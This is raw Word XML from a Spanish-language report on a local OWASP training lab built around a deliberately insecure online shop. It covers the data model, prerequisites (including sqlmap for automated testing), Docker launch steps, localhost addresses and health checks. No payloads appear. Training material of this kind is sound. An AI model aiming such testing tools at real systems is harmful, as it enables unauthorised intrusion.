            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="379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1A3CC1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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Catálogo, precio, stock e imagen.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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996466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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Puede aparecer en </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">muchos </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>pedido</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>_items</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="49B05CC7" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984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F9CBED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pedidos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798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113A16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Cabecera de una compra.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3572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EE228E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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Pertenece a un usuario y contiene ítems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="1039D7C5" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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E42B2B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pedido_items</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="379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58C12E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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Detalle de producto, cantidad y precio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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7A9CC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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Pertenece a un pedido y referencia un producto.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1617602F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D1A6B8" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF5AACD" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Guía de despliegue y ejecución</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA638A9" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>5.1 Requisitos previos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD8A275" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Windows 10/11, Linux o macOS con Docker Desktop/Docker Engine activo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD2E08" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Docker Compose v2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193BC658" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Al menos 2 GB de memoria disponible y puertos 3000, 8080 y</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5432 libres.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2534E4DA" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>PowerShell 5.1 o superior; se recomienda PowerShell 7 para formularios multipart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793C5296" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Python 3 y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> para la prueba automatizada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A394B11" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Maven 3.8+ y Java 17 solamente si se ejecutará el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> fuera de Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23018758" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>5.2 Ejecución rápida</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB20F57" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>En el paquete com</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>partido con el equipo, abrir Docker Desktop, descomprimir todo el proyecto y ejecutar el lanzador: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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="66608461" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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4450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rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="18"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>INICIAR_LABORATORIO.bat</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="18"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="18"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
              <w:t># Seleccionar la opción de Tienda Insegura V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FC37CD8" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29992AC2" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">El lanzador valida Docker, inicia el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y abre la dirección </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>correspondiente. La modalidad manual se describe a continuación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740A2878" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Ejecución manual con Docker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Compose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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="7FFF73FF" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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F752F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>cd "C:\Laboratorio-OWASP\tienda-insegura-v1-mejorada"</w:t>
            </w:r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br/>
            </w:r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br/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>docker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 xml:space="preserve"> --</w:t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>version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br/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>docker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 xml:space="preserve"> </w:t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>compose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 xml:space="preserve"> </w:t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>version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br/>
            </w:r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br/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>docker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 xml:space="preserve"> </w:t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>compose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 xml:space="preserve"> --</w:t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>profile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 xml:space="preserve"> full up -d --</w:t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>build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br/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>docker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 xml:space="preserve"> </w:t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>comp</w:t>
            </w:r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>ose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 xml:space="preserve"> </w:t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>ps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0611FB5F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE51731" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Estados esperados: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>healthy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>frontend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> en Up/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Started</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>. La primera compilación puede tardar porque Maven descarga dependencias.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1"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="3EC2A60A" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:hRule="exact" w:val="1984"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dashed" w:sz="8" w:space="0" w:color="AAB2BE"/>
              <w:left w:val="dashed" w:sz="8" w:space="0" w:color="AAB2BE"/>
              <w:bottom w:val="dashed" w:sz="8" w:space="0" w:color="AAB2BE"/>
              <w:right w:val="dashed" w:sz="8" w:space="0" w:color="AAB2BE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F6F7F9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41B7AF08" w14:textId="0AD96349" w:rsidR="00217A21" w:rsidRDefault="00742FE9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50C29B98" wp14:editId="12146468">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-84455</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-1284605</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="6179820" cy="1272540"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3810"/>
                  <wp:wrapSquare wrapText="bothSides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9820" cy="1272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C68A932" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 2. Contenedores de la Versión 1 ejecutándose y </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>servicios publicados en localhost.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t>Fuente: elaboración propia a partir de la ejecución del laboratorio local.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6180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="17A53DA1" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3061" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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2FBBA7" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Recurso</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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3EE35D" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Dirección</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="26D7F69E" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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3A10F8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Tienda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="61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A9DEE0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http://127.0.0.1:3000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="175A51B2" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3061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1CCA90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API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6180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93D4DF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http://127.0.0.1:8080/api</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="1CB5EFDD" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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FCD59A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Actuator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="61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9B8123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http://127.0.0.1:8080/actuator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="1EF427F7" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3061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BFA417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PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6180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06BFAC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127.0.0.1:5432</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17ADF996" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="084CB494" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.4 Verificación y solución de problemas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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="17FCCDE7" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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85761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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Invoke-RestMethod "http://127.0.0.1:8080/actuator/health"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>Invoke-RestMethod "http://127.0.0.1:8080/api/productos"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>Invoke-WebRequest "http://127.0.0.1:3000"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> -Method Head</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t># Logs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>docker compose logs --tail=100 backend</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>docker compose logs --tail=100 postgres</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>docker compose logs --tail=100 frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5873CA18" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
